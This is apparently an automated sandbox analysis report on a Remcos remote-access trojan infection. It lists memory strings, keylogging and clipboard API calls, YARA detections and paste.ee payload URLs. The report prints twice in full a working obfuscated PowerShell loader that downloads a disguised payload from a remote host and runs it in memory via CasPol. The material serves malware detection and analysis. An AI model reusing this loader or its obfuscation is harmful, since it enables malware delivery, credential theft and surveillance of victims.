                        Source: wscript.exe, 00000003.00000003.1295897528.00000000060A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293060842.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287158709.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287463934.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1289734743.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287413162.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1292904302.0000000005FDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287522743.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbs
                        Source: wscript.exe, 00000003.00000003.1293060842.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287158709.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287463934.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287413162.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287522743.00000000061FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScript/blob/master/ProjectInfo.vbsP
                        Source: wscript.exe, 00000003.00000003.1295897528.00000000060A0000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293060842.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287158709.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287463934.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298650084.0000000005F90000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1289734743.0000000005FD9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287413162.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1292904302.0000000005FDA000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1289734743.0000000005FB6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1289297265.00000000031F5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287522743.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, 0[1].txt.3.drString found in binary or memory: https://github.com/koswald/VBScript/blob/master/SetupPerUser.md
                        Source: wscript.exe, 00000003.00000003.1293060842.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287158709.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287463934.00000000061FC000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287413162.00000000061F3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1287522743.00000000061FC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/koswald/VBScriptB
                        Source: powershell.exe, 0000000A.00000002.1399699472.0000000004A91000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                        Source: wscript.exe, 00000003.00000003.1293173297.00000000031CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298085040.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1294083220.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1290712578.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                        Source: recover.exe, 0000000E.00000002.1405561588.0000000003138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_autho
                        Source: recover.exe, 0000000E.00000002.1405561588.0000000003138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                        Source: recover.exe, 0000000E.00000002.1405561588.0000000003138000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                        Source: recover.exe, 0000000E.00000002.1405525338.0000000003129000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000E.00000002.1405561588.0000000003138000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000E.00000003.1404949297.0000000003129000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                        Source: recover.exeString found in binary or memory: https://login.yahoo.com/config/login
                        Source: powershell.exe, 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: wscript.exe, 00000003.00000003.1293173297.00000000031CF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298085040.00000000031D3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1294083220.00000000031D2000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1290712578.00000000031D2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/
                        Source: wscript.exe, 00000003.00000003.1293649425.0000000003184000.00000004.00000020.00020000.00000000.sdmp, earereallyniceloverwithgreatthingsonthatkissinggirlonme.hta, nonordinary.vbs.1.dr, unmovably.bat.0.drString found in binary or memory: https://paste.ee/d/h0hNZ9qO/0
                        Source: wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/h0hNZ9qO/0H~
                        Source: wscript.exe, 00000003.00000002.1298231333.0000000003400000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://paste.ee/d/h0hNZ9qO/99
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://secure.gravatar.com
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://themes.googleusercontent.com
                        Source: wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000C.00000002.3708800960.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, recover.exe, recover.exe, 00000010.00000002.1392482413.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                        Source: recover.exeString found in binary or memory: https://www.google.com/accounts/servicelogin
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com;
                        Source: wscript.exe, 00000003.00000003.1290712578.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293393937.00000000031E6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1293649425.00000000031CB000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000003.1296343760.00000000053E3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1297734361.0000000003118000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000003.00000002.1298015541.00000000031CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                        Source: unknownHTTPS traffic detected: 23.186.113.60:443 -> 192.168.2.5:49720 version: TLS 1.2

                        Key, Mouse, Clipboard, Microphone and Screen Capturing

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409D1E SetWindowsHookExA 0000000D,00409D0A,0000000012_2_00409D1E
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B158
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041696E OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,12_2_0041696E
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00409E39 EmptyClipboard,wcslen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,14_2_00409E39
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 14_2_00409EA1 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,14_2_00409EA1
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00406DFC EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,15_2_00406DFC
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 15_2_00406E9F EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,15_2_00406E9F
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004068B5 EmptyClipboard,GetFileSize,GlobalAlloc,GlobalLock,ReadFile,GlobalUnlock,SetClipboardData,GetLastError,CloseHandle,GetLastError,CloseClipboard,16_2_004068B5
                        Source: C:\Windows\SysWOW64\recover.exeCode function: 16_2_004072B5 EmptyClipboard,strlen,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,SetClipboardData,CloseClipboard,16_2_004072B5
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0040B158 OpenClipboard,GetClipboardData,CloseClipboard,12_2_0040B158
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_00409E4A GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,12_2_00409E4A
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR

                        E-Banking Fraud

                        barindex
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000C.00000002.3706537610.0000000000E18000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTR
                        Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTR

                        Spam, unwanted Advertisements and Ransom Demands

                        barindex
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 12_2_0041CF2D SystemParametersInfoW,12_2_0041CF2D

                        System Summary

                        barindex
                        Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 10.2.powershell.exe.5acb250.7.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 12.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 10.2.powershell.exe.5acb250.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                        Source: 0000000C.00000002.3705202126.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                        Source: 0000000A.00000002.1403832641.0000000005A28000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: 0000000A.00000002.1403832641.0000000005671000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: Process Memory Space: powershell.exe PID: 3824, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                        Source: Process Memory Space: CasPol.exe PID: 8328, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                        Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4}Jump to behavior
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"
                        Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "$Codigo = 'J#B0#GU#cgBy#GE#YwBp#G4#ZwBz#C##PQ#g#Cc#d#B4#HQ#LgBl#G0#bgBv#Gw#cgBp#Gc#ZwBu#Gk#cwBz#Gk#awB0#GE#a#B0#G4#bwBz#Gc#bgBp#Gg#d#B0#GE#ZQBy#Gc#a#B0#Gk#dwBy#GU#dgBv#Gw#ZQBj#Gk#bgB5#Gw#b#Bh#GU#cgBl#HI#YQBl#Hc#Lw#w#DY#Ng#v#Dg#O##u#DE#OQ#x#C4#NQ#0#DI#Lg#y#Dc#MQ#v#C8#OgBw#HQ#d#Bo#Cc#Ow#k#GI#YQBy#GI#bwB0#Gk#bgBl#C##PQ#g#CQ#d#Bl#HI#cgBh#GM#aQBu#Gc#cw#g#C0#cgBl#H##b#Bh#GM#ZQ#g#Cc#Iw#n#Cw#I##n#HQ#Jw#7#CQ#bQBh#HM#cwBp#GU#cg#g#D0#I##n#Gg#d#B0#H##Og#v#C8#MQ#w#DQ#Lg#x#DY#O##u#Dc#Lg#z#Dg#LwB4#GE#bQBw#H##LwBz#HY#LwBF#E4#QwBS#Fk#U#BU#Ek#TwBO#D##MQ#u#Go#c#Bn#Cc#Ow#k#GU#cQB1#Gk#dgBh#Gw#dgB1#Gw#YQBy#C##PQ#g#E4#ZQB3#C0#TwBi#Go#ZQBj#HQ#I#BT#Hk#cwB0#GU#bQ#u#E4#ZQB0#C4#VwBl#GI#QwBs#Gk#ZQBu#HQ#Ow#k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#C##PQ#g#CQ#ZQBx#HU#aQB2#GE#b#B2#HU#b#Bh#HI#LgBE#G8#dwBu#Gw#bwBh#GQ#R#Bh#HQ#YQ#o#CQ#bQBh#HM#cwBp#GU#cg#p#Ds#J#BN#GE#bgBp#Gw#awBh#HI#YQ#g#D0#I#Bb#FM#eQBz#HQ#ZQBt#C4#V#Bl#Hg#d##u#EU#bgBj#G8#Z#Bp#G4#ZwBd#Do#OgBV#FQ#Rg#4#C4#RwBl#HQ#UwB0#HI#aQBu#Gc#K##k#GE#YwBl#HQ#bwBw#Gg#ZQBu#GU#d#Bp#GQ#aQBu#Ck#Ow#k#Fo#aQBt#GI#YQBi#Hc#ZQBh#G4#cw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#FM#V#BB#FI#V##+#D4#Jw#7#CQ#YQB6#G8#d#Bl#GQ#I##9#C##Jw#8#Dw#QgBB#FM#RQ#2#DQ#XwBF#E4#R##+#D4#Jw#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#WgBp#G0#YgBh#GI#dwBl#GE#bgBz#Ck#Ow#k#Gs#bgBp#HQ#YwBo#GU#d##g#D0#I##k#E0#YQBu#Gk#b#Br#GE#cgBh#C4#SQBu#GQ#ZQB4#E8#Zg#o#CQ#YQB6#G8#d#Bl#GQ#KQ#7#CQ#ZQBu#HQ#ZQBy#G8#bg#g#C0#ZwBl#C##M##g#C0#YQBu#GQ#I##k#Gs#bgBp#HQ#YwBo#GU#d##g#C0#ZwB0#C##J#Bl#G4#d#Bl#HI#bwBu#Ds#J#Bl#G4#d#Bl#HI#bwBu#C##Kw#9#C##J#Ba#Gk#bQBi#GE#YgB3#GU#YQBu#HM#LgBM#GU#bgBn#HQ#a##7#CQ#bQBh#HQ#a#Bl#G0#YQB0#Gk#YwBz#C##PQ#g#CQ#awBu#Gk#d#Bj#Gg#ZQB0#C##LQ#g#CQ#ZQBu#HQ#ZQBy#G8#bg#7#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#I##9#C##J#BN#GE#bgBp#Gw#awBh#HI#YQ#u#FM#dQBi#HM#d#By#Gk#bgBn#Cg#J#Bl#G4#d#Bl#HI#bwBu#Cw#I##k#G0#YQB0#Gg#ZQBt#GE#d#Bp#GM#cw#p#Ds#J#Bj#G8#bQBl#GQ#aQBl#G4#bgBl#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#EM#bwBu#HY#ZQBy#HQ#XQ#6#Do#RgBy#G8#bQBC#GE#cwBl#DY#N#BT#HQ#cgBp#G4#Zw#o#CQ#YQBm#GY#bwBh#HI#Z#Bl#GQ#KQ#7#CQ#bwB1#HQ#cgBl#GE#YwBo#HM#I##9#C##WwBT#Hk#cwB0#GU#bQ#u#FI#ZQBm#Gw#ZQBj#HQ#aQBv#G4#LgBB#HM#cwBl#G0#YgBs#Hk#XQ#6#Do#T#Bv#GE#Z##o#CQ#YwBv#G0#ZQBk#Gk#ZQBu#G4#ZQBz#Ck#Ow#k#HY#YQBs#GU#d#B1#GQ#aQBu#GE#cgBp#GE#I##9#C##WwBk#G4#b#Bp#GI#LgBJ#E8#LgBI#G8#bQBl#F0#LgBH#GU#d#BN#GU#d#Bo#G8#Z##o#Cc#VgBB#Ek#Jw#p#C4#SQBu#HY#bwBr#GU#K##k#G4#dQBs#Gw#L##g#Fs#bwBi#Go#ZQBj#HQ#WwBd#F0#I#B##Cg#J#Bi#GE#cgBi#G8#d#Bp#G4#ZQ#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#QwBh#HM#U#Bv#Gw#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#s#Cc#Jw#p#Ck#'; $OWjuxd = [System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String($Codigo.Replace('#','A'))); Invoke-Expression $OWjuxd"Jump to behavior
                        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess Stats: CPU usage > 49%
